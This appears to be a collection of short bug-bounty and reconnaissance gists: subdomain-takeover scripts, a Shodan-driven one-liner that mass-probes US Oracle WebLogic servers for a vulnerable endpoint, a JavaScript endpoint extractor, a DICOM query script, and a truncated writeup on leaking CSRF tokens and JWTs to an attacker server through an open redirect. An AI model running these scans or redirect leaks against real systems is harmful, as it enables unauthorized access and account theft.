itsmenaga

#!/bin/bash
echo "[*]Subfinder and Aquatone Scan Started [*]"
subfinder -d $1 -o $1.json -oT -nW -v
rm -rf /root/pentest/results/$1
mkdir /root/pentest/results/$1
cp $1.json /root/pentest/results/$1/
mv /root/pentest/results/$1/$1.json /root/pentest/results/$1/hosts.json
aquatone-scan -d $1 --ports huge --threads 10
DEBUG=nightmare xvfb-run -a aquatone-gather -d $1 --threads 10
aquatone-takeover -d $1 --threads 10

itsmenaga

#!/bin/bash
aquatone-discover -d $1 --threads 10
aquatone-scan -d $1 --ports huge --threads 10
DEBUG=nightmare xvfb-run -a aquatone-gather -d $1 --threads 10
aquatone-takeover -d $1 --threads 10

itsmenaga

#!/bin/bash

# this script was written by viss as a challenge from @random_robbie
# This one-liner replaces a fairly lengthy python script
# if you want to be walked through it, sign up for square cash, send $viss 20 dollars. Otherwise, flex your google fu!
# oh, ps: you need to pip install shodan, and then configure the shodan cli client by giving it your api key.
# then you're off to the races.

shodan search --fields ip_str --limit 1000 'product:"Oracle Weblogic" port:"7001" country:"US"' | sort -u | nmap -sT -Pn -n -oG - -iL - -p 7001 | grep open | awk '{print $2}' | xargs -I % -n 1 -P 30 bash -c 'RESULT=`curl -s -I -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko0100101 Firefox/54.0" -H "Connection":"close" -H "Accept-Language":"en-US -H en;q=0.5" -H "Accept":"text/html -H application/xhtml+xml -H application/xml;q=0.9 -H */*;q=0.8" -H "Upgrade-Insecure-Requests":"1" %:7001/ws_utc/config.do | egrep HTTP`; echo "%: $RESULT";'

itsmenaga

#Tools based on a resolver.rb by @melvinsh
#Repository: https://github.com/melvinsh/subresolve
#Modified by @ehsahil for Personal Use.
#Modified by @nikallass for Personal Use.

require 'socket'
require 'colorize'

begin
  if ARGV[0] == nil

itsmenaga

You do not need to run 80 reconnaissance tools to get access to user accounts

An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input in the client-side, and sending sensitive information to my server using an open redirect.

CSRF token bug

1. There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
2. User loads https://example.com/?code=VALUE
3. Javascript code in https://example.com/ makes a GET request to https://example.com/verify/VALUE with a header x-csrf-token set to the CSRF token for the session of the user

   GET /verify/VALUE HTTP/1.1
   Host: example.com
   

itsmenaga

#! /usr/bin/python3
import webbrowser, sys

if len(sys.argv) < 3:
    print("Usage: openinbrowser.py ./urls.txt 20")
    quit()

f = open(sys.argv[1])
tabs = int(sys.argv[2])
counter = 1

itsmenaga

curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(\>\>\>)|(['\\\"](https?:)?[/]{1,2}[^'\\\"]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu

function ejs() {
  curl -L -k -s "$1" | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu
}

itsmenaga

#/usr/bin/env python3
# run me with ulimits -n 2048

import itertools
import string
from pydicom.dataset import Dataset
from pynetdicom import AE, QueryRetrievePresentationContexts
from pynetdicom.sop_class import PatientRootQueryRetrieveInformationModelFind
import sys
import time

itsmenaga

// Mozilla User Preferences
// To change a preference value, you can either:
// - modify it via the UI (e.g. via about:config in the browser); or
// - set it within a user.js file in your profile (create it if it doesn't exist).
//
// Profile folder location on different systems:
// Windows: C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles\xxxxxxxx.default
// Mac OS X: Users/<username>/Library/Application Support/Firefox/Profiles/xxxxxxxx.default
// Linux: /home/<username>/.mozilla/firefox/xxxxxxxx.default

itsmenaga

#!/bin/bash
touch index.html
touch error.html
aws s3api create-bucket --bucket $1 --region us-east-1
aws s3 website s3://$1/ --index-document index.html --error-document error.html
aws s3 cp index.html s3://$1 --acl public-read
aws s3 cp error.html s3://$1 --acl public-read